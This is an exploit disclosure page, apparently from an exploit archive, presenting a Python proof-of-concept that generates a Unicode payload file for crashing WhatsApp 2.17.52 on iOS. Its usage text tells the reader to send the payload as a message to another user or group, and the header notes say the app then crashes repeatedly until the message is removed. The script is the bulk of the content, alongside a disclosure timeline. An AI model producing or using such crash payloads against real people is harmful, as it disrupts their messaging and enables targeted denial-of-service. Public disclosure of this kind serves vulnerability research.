WhatsApp 2.17.52 Memory Corruption

2017.11.01
Credit: Juan Sacco
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/env python # -*- coding: utf-8 -*- # Found this and more exploits on my open source security project: http://www.exploitpack.com # Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com # Date and time of release: 11 October 2017 # # Tested on: iPhone 5/6s iOS 10.3.3 and 11 # # Description: # WhatsApp 2.17.52 and prior is prone to a remote memory corruption. # This type of attacks are possible if the program uses memory inefficiently and does not impose limits on the amount of state used when necessary. # # Impact: # Resource exhaustion attacks exploit a design deficiency. An attacker could exploit this vulnerability to remotely corrupt the memory of the application forcing an uhandled exception # in the context of the application that could potentially result in a denial-of-service condition and/or remote memory corruption. # # Warning note: # Once a user receives the offending message it will automatically crash the application and if its restarted it will crash again until the message its manually removed from the user's history. # # Timeline: # 09/13/2017 - Research started # 09/13/2017 - First proof of concept # 09/15/2017 - Reported to Whatsapp # 09/20/2017 - Report Triaged by Facebook # 11/01/2017 - Facebook never replied back with a status fix # 11/01/2017 - Disclosure as zero day # Vendor homepage: http://www.whatsapp.com import sys reload(sys) def whatsapp(filename): sys.setdefaultencoding("utf-8") payload = u'O" O(c) Oa O<< O! O O(r) O- Odeg O+- O2 O3 O' Ou OP O* O, O1 Oo U U U U U U' * 1337 sutf8 = payload.encode('UTF-8') print "[*] Writing to file: " + filename open(filename, 'w').write(payload) print "[*] Done." def howtouse(): print "Usage: whatsapp.py [FILENAME]" print "[*] Mandatory arguments:" print "[-] FILENAME" sys.exit(-1) if __name__ == "__main__": try: print "[*] WhatsApp 2.17.52 iOS - Remote memory corruption by Juan Sacco" print "[*] How to use: Copy the content of the file and send it as a message to another whatsapp user or group" whatsapp(sys.argv[1]) except IndexError: howtouse()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top